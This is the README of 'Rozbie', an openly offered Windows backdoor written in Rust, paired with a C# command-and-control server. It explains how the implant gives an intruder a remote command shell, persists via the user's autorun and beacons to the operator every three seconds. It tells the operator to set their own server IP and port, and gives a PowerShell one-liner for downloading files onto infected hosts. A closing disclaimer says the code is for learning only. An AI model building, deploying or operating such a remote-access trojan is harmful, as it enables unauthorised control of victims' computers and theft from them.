Version: 0.1.0
This is a simple and very standard malware code that provide an access to the infected host. The Rozbie works only on Windows OS.
The presented solution consists of two project:
- Rozbie malware written in Rust. It is a program that must be run in the target system to give an intruder an access to the system's command line console.
- Rozbie Farm is a server in which you can execute commands to run on infected with Rozbie computers. It can handle multiple instances of Rozbie.
It is up to you how you install Rozbie on the target computer. On successful run the Rozbie will add itself to the Windows current user autorun. It should run after the user logged into system. When it is there it will try to connect to The Rozbie Farm application once per 3 seconds. You should be able to type DOS commands in the Rozbie Farm application to be executed on the infected computer.
You must change the IP address and eventually the port to yours in the main.rs:
const SERVER_IP: &'static str = "192.168.0.22";
const SERVER_PORT: &'static str = "1973";
The same must be changed on the C# side in the Server.cs file:
private static readonly int SERVER_PORT = 1973;
private static readonly string SERVER_IP = "192.168.0.22";
The Rozbie should execute almost every DOS command on the infected host. There is a special command that can be executed only by the Rozbie:
- 'q' - Shutdowns Rozbie.
Note: After user logged into the system current directory of the Rozbie should be Windows\System32 which can include thousands of files. It's better to type first: 'cd ..' to change directory to one level up instead of 'dir'. There is a static buffer which can hold up to 1MB of data only. You can change it to a bigger value of course. It is something to address in future commits but as long as it is just a small vicious program, some optimizations are missing now.
- How can I upload something to the infected host?
You can do it by executing PowerShell command, e.g.:
powershell -c "Invoke-WebRequest -Uri 'https://www.website.com/file.zip' -OutFile 'c:\temp\file.zip'"
For a more sophisticated solution try Flea
The author of this code is not responsible for the incorrect operation of the presented code and/or for its incorrect use. The code presented in this project is intended to serve only to learn programming.
This project is licensed under MIT
MIT license (LICENSE-MIT or http://opensource.org/licenses/MIT)
I am always glad to learn from anyone. If you want to contribute, you are more than welcome to be a part of the project! Try to share you thoughts first! Feel free to open a new issue if you want to discuss new ideas.
Any kind of feedback is welcome!